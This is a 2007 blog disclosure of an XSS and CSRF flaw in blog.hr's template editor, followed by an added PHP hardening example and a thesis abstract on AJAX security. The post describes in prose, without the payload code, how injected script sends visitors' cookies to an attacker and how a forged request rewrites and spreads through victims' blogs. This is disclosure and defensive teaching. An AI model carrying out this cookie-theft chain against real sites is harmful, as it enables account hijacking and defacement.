Monday, July 16, 2007

Hacking blog.hr

A few months ago, I discovered a security flaw in the BLOG beta web application on www.blog.hr. Blog.hr was notified of the flaw around 3 months ago and I received compensation in the form of banner advertising for the problem description. Since I haven't received an answer to my request to make this public in more than a few weeks, I will disclose it now. As far as I can see, they haven't fixed it yet. This advisory is provided under the policy documented at http://www.wiretrip.net/rfp/policy.html.

Here is the explanation.

While editing a blog, a user can access the HTML code of the template. JavaScript code is not filtered in any way. We insert the following code inside the HEAD section of the HTML:

This is a regular XSS+CSRF attack: the browser, instead of fetching an image, sends the cookie data of the visiting user. If that user is logged on, the cookies are sent to the attacker's server via a GET parameter.

The csrf.php script is a modified HTTP client class (http://www.phpclasses.org/browse/package/576.html). The script creates an HTTP POST request to change the BOX-4 section of the victim's blog (www.blog.hr/edit/?page=blogeditor&menu=2,3), inserting the received cookie data into the request header and setting a valid Referer field. When the request is received on blog.hr, it appears to be legitimate.

BOX-4 can also be used for defacement, with code like:



Also, JavaScript can be inserted inside the BOX-4 section, so the code could propagate quite fast.
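The attack chain above relies on two weaknesses: the session cookie is readable from JavaScript (so the injected script can exfiltrate it), and the editor endpoint accepts any POST that carries the cookie and a plausible Referer header (which csrf.php simply sets). The following PHP is an added example of how a server could close both gaps; it is not blog.hr's code and assumes a modern PHP (7.3 or later, for the array form of session_set_cookie_params) and a hypothetical editor endpoint that saves BOX-4 content.

```php
<?php
// Added example (not blog.hr code): hardening the two weak points described above.
// 1. Mark the session cookie HttpOnly, so document.cookie cannot read it.
// 2. Require a per-session CSRF token on state-changing requests instead of
//    trusting the Referer header, which any HTTP client can set freely.
declare(strict_types=1);

// Cookie flags must be set before session_start() (PHP 7.3+ array form assumed).
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,   // only sent over HTTPS
    'httponly' => true,   // not exposed to JavaScript
    'samesite' => 'Lax',  // not attached to cross-site POST requests
]);
session_start();

// Issue one random token per session and embed it in the editor form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_valid(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Hypothetical editor endpoint: refuse any save without a valid token,
    // regardless of what the Referer header says.
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // save_box4($_POST['box4']);  // hypothetical save routine, not shown
}
?>
<form method="post" action="/edit/?page=blogeditor&amp;menu=2,3">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <textarea name="box4"></textarea>
  <button type="submit">Save</button>
</form>
```

The token check stops a request forged from another origin, and HttpOnly stops the injected script from reading the cookie. Neither measure helps against script that already runs in the blog's own origin, since same-origin JavaScript can read the token out of the form; the template editor still has to filter or sanitize HTML so that script cannot be stored there in the first place.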

Here is the video:



Here are the files:
PHP class
PHP script
JS code for XSS

Monday, July 9, 2007

Diploma thesis - Security of AJAX Web applications

My diploma thesis is finally done. The link is on the right (Croatian language only).


Abstract

This diploma thesis describes security problems in Web applications based on AJAX technology. It describes basic AJAX mechanisms, the most common Web application vulnerabilities and the problems specific to AJAX applications, as well as ways of resolving them. Most descriptions are followed by real-life examples for easier understanding. The examples also show the newest trends in exploiting vulnerabilities in the communication between client and server, as well as on the client itself. The practical part of the paper describes the AJAX application created for manipulating IKE configuration files and the security problems specific to that application.